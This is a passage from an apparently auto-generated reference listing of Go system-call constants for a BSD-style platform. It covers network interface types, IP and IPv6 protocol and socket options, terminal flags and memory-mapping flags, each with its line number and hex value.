619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | 